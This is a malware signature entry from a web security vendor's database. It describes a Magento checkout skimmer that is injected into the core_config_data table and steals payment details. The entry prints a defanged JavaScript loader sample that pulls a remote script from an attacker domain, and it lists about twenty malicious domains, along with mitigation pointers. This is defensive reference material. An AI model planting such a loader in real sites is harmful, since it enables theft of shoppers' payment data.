Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.magento_shoplift.38.2

Description: Injection of malicious scripts into Magneto checkout pages. The scripts steal entered payment details and send them to remote third-party sites.

The scripts are typically injected into the core_config_data table

Sample:

<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = 'controlmage[.]com/e/tracking.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>

Domain involed: apissystem[.]com, codesmagento[.]com, controlmage[.]com, cdnppay[.]com, resselerratings[.]com, cdngoogle[.]com, apismanagers[.]com, verpayments[.]com, myageverify[.]com, assetsbraln[.]com, verpayment[.]com, magesources[.]com,traskedlink[.]com, magejavascripts[.]com, mjs24[.]com, m24js[.]com, cdnassels[.]com, magescripts[.]pw and jscriptscloud[.]com

For additional details check the Ecommerce security category of our blog.

Affecting: Magento

Mitigation How to clean a hacked Magento site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb